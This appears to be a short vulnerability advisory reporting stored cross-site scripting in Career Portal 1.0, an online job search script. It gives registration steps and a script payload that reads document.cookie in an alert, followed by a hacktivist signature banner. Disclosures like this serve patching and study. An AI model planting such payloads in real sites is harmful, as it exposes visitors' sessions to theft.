Career Portal 1.0 Cross Site Scripting

Career Portal Online Job Search Script version 1.0 suffers from a cross site scripting vulnerability.


MD5 | 1bdbb11a81e5f8e665575fcb750dd40b

# Exploit Title: Career Portal - Online Job Search Script - Xss
# Google Dork: N/A
# Date: 2018/01/01
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: http://sharjeelanjum.com/
# Software Buy: https://codecanyon.net/item/career-portal-online-job-search-script/20767278?s_rank=177
# Demo: http://sharjeelanjum.com/demos/career-portal/
# Version: 1.0
# Tested on: Win7 x64,
# Exploit :

Hi 2 All
1. go to http://[site]/employer_register
2. insert to textbox "Name" -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
3. Create An Account.
4. click to Create Account button.
5. go to http://[site]/career-portal/job



:D:D

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/-------------------------------------------------------------\
| My Message To |
\-------------------------------------------------------------/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Related Posts